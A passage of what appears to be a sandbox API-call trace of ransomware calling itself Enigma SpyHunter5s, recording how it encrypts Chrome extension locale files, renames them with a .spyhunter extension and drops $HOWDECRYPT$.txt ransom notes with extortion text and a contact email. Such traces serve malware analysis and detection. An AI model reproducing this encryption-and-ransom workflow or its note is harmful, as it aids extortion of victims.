RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.115] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceba4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceba4*=0x109, lpOverlapped=0x0) returned 1 [0159.116] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffef7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.116] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x25ceba4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceba4*=0x109, lpOverlapped=0x0) returned 1 [0159.116] GetProcessHeap () returned 0x2c0000 [0159.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.116] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.116] WriteFile (in: hFile=0x178, lpBuffer=0x25cebe4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceba4, lpOverlapped=0x0 | out: lpBuffer=0x25cebe4*, lpNumberOfBytesWritten=0x25ceba4*=0x4, lpOverlapped=0x0) returned 1 [0159.116] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceba4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceba4*=0x30, lpOverlapped=0x0) returned 1 [0159.117] CloseHandle (hObject=0x178) returned 1 [0159.117] GetProcessHeap () returned 0x2c0000 [0159.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.117] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.spyhunter") returned 165 [0159.117] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.spyhunter")) returned 1 [0159.118] GetProcessHeap () returned 0x2c0000 [0159.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.118] GetProcessHeap () returned 0x2c0000 [0159.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.118] GetProcessHeap () returned 0x2c0000 [0159.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1cf28 | out: hHeap=0x2c0000) returned 1 [0159.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.119] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.119] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb17*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec40, lpOverlapped=0x0 | out: lpBuffer=0x25ceb17*, lpNumberOfBytesWritten=0x25cec40*=0x127, lpOverlapped=0x0) returned 1 [0159.120] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.120] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec40, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec40*=0x2ac, lpOverlapped=0x0) returned 1 [0159.120] CloseHandle (hObject=0x178) returned 1 [0159.120] GetProcessHeap () returned 0x2c0000 [0159.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1fe60 | out: hHeap=0x2c0000) returned 1 [0159.120] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cebe0 | out: pbBuffer=0x25cebe0) returned 1 [0159.120] GetProcessHeap () returned 0x2c0000 [0159.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.120] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebd8*=0x30) returned 1 [0159.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.121] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0159.121] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.121] GetProcessHeap () returned 0x2c0000 [0159.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.121] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb9c*=0xdf, lpOverlapped=0x0) returned 1 [0159.122] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.122] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x25ceb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb9c*=0xdf, lpOverlapped=0x0) returned 1 [0159.122] GetProcessHeap () returned 0x2c0000 [0159.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.123] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.123] WriteFile (in: hFile=0x178, lpBuffer=0x25cebdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb9c, lpOverlapped=0x0 | out: lpBuffer=0x25cebdc*, lpNumberOfBytesWritten=0x25ceb9c*=0x4, lpOverlapped=0x0) returned 1 [0159.123] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb9c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb9c*=0x30, lpOverlapped=0x0) returned 1 [0159.123] CloseHandle (hObject=0x178) returned 1 [0159.123] GetProcessHeap () returned 0x2c0000 [0159.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.123] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.spyhunter") returned 168 [0159.123] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json.spyhunter")) returned 1 [0159.124] GetProcessHeap () returned 0x2c0000 [0159.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.124] GetProcessHeap () returned 0x2c0000 [0159.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.124] GetProcessHeap () returned 0x2c0000 [0159.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1cda0 | out: hHeap=0x2c0000) returned 1 [0159.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.125] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.125] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb0f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec38, lpOverlapped=0x0 | out: lpBuffer=0x25ceb0f*, lpNumberOfBytesWritten=0x25cec38*=0x127, lpOverlapped=0x0) returned 1 [0159.126] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.126] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec38, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec38*=0x2ac, lpOverlapped=0x0) returned 1 [0159.127] CloseHandle (hObject=0x178) returned 1 [0159.127] GetProcessHeap () returned 0x2c0000 [0159.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1fcc8 | out: hHeap=0x2c0000) returned 1 [0159.127] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cebd8 | out: pbBuffer=0x25cebd8) returned 1 [0159.127] GetProcessHeap () returned 0x2c0000 [0159.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.127] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebd0*=0x30) returned 1 [0159.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.128] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0159.128] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.129] GetProcessHeap () returned 0x2c0000 [0159.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.129] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb94*=0xde, lpOverlapped=0x0) returned 1 [0159.130] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.130] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x25ceb94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb94*=0xde, lpOverlapped=0x0) returned 1 [0159.130] GetProcessHeap () returned 0x2c0000 [0159.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.130] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.130] WriteFile (in: hFile=0x178, lpBuffer=0x25cebd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb94, lpOverlapped=0x0 | out: lpBuffer=0x25cebd4*, lpNumberOfBytesWritten=0x25ceb94*=0x4, lpOverlapped=0x0) returned 1 [0159.131] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb94, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb94*=0x30, lpOverlapped=0x0) returned 1 [0159.131] CloseHandle (hObject=0x178) returned 1 [0159.131] GetProcessHeap () returned 0x2c0000 [0159.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.131] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.spyhunter") returned 168 [0159.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json.spyhunter")) returned 1 [0159.132] GetProcessHeap () returned 0x2c0000 [0159.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.133] GetProcessHeap () returned 0x2c0000 [0159.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.133] GetProcessHeap () returned 0x2c0000 [0159.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1cc18 | out: hHeap=0x2c0000) returned 1 [0159.133] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.134] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.134] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb07*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec30, lpOverlapped=0x0 | out: lpBuffer=0x25ceb07*, lpNumberOfBytesWritten=0x25cec30*=0x127, lpOverlapped=0x0) returned 1 [0159.135] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.135] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec30, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec30*=0x2ac, lpOverlapped=0x0) returned 1 [0159.136] CloseHandle (hObject=0x178) returned 1 [0159.136] GetProcessHeap () returned 0x2c0000 [0159.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1c908 | out: hHeap=0x2c0000) returned 1 [0159.136] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cebd0 | out: pbBuffer=0x25cebd0) returned 1 [0159.136] GetProcessHeap () returned 0x2c0000 [0159.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.136] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebc8*=0x30) returned 1 [0159.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.138] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json") returned 155 [0159.138] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.138] GetProcessHeap () returned 0x2c0000 [0159.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.138] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb8c*=0x14c, lpOverlapped=0x0) returned 1 [0159.139] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffeb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.139] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x25ceb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb8c*=0x14c, lpOverlapped=0x0) returned 1 [0159.139] GetProcessHeap () returned 0x2c0000 [0159.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.139] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.140] WriteFile (in: hFile=0x178, lpBuffer=0x25cebcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb8c, lpOverlapped=0x0 | out: lpBuffer=0x25cebcc*, lpNumberOfBytesWritten=0x25ceb8c*=0x4, lpOverlapped=0x0) returned 1 [0159.140] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb8c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb8c*=0x30, lpOverlapped=0x0) returned 1 [0159.140] CloseHandle (hObject=0x178) returned 1 [0159.140] GetProcessHeap () returned 0x2c0000 [0159.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.141] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.spyhunter") returned 165 [0159.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 